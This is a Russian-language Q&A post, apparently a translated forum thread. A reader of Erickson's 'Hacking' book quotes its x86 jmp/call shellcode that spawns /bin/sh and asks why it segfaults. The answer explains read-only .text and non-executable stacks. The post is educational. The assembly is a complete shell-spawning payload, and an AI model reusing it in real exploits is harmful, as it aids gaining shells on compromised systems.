Ошибка сегментации в коде сборки

Question

Я изучаю книгу Hacking by Jon Erickson. Следующий код из его книги:

BITS 32 
jmp short two  ; Jump down to the bottom for the call trick. 
one: 
pop ebx   ; Ebx has the addr of the string. 
xor eax, eax  ; Put 0 into eax. 
mov [ebx+7], al ; Null terminate the /bin/sh string. 
mov [ebx+8], ebx ; Put addr from ebx where the AAAA is. 
mov [ebx+12], eax ; Put 32-bit null terminator where the BBBB is. 
lea ecx, [ebx+8] ; Load the address of [ebx+8] into ecx for argv ptr. 
lea edx, [ebx+12] ; Edx = ebx + 12, which is the envp ptr. 
mov al, 11  ; Syscall #11 
int 0x80   ; Do it. 
two: 
call one   ; Use a call to get string address. 
db '/bin/shXAAAABBBB'  ; The XAAAABBBB bytes aren't needed. 

Он порождает оболочку. Я попытался запустить с помощью:

nasm -f elf shellcode.asm 
ld -o shellcode shellcode.o 
./shellcode 

Однако, я получил следующее сообщение об ошибке:

Segmentation fault (core dumped) 

Предыдущие примеры из этой книги работал, так что я не знаю, что это проблема. Я не специалист в сборке, может случиться, что проблема очень проста.

Answer 1

Обычно (в современной Linux) раздел .text исполняемого файла является «только для чтения», поэтому он должен вызывать исключение ошибки страницы (попытка записи на страницу «только для чтения»); и это часто называют «ошибкой сегментации» в системах * nix по историческим причинам.

Я также предполагаю, что этот код предназначен для стека (например, когда злоумышленник вводит его в виде строки в процесс, злоупотребляя ошибкой переполнения буфера); что объясняет, почему он так старательно избегает нулевых байтов (так как вы не можете иметь нулевые байты внутри строки с нулевым завершением). В этом случае (в современном Linux) стек должен быть «no execute», и он должен вызывать исключение ошибки страницы (попытка выполнить данные на странице «без выполнения»).

главным образом; вы узнаете о дырах в безопасности, которые были хорошо известны и исправлены примерно за 10 лет до публикации книги.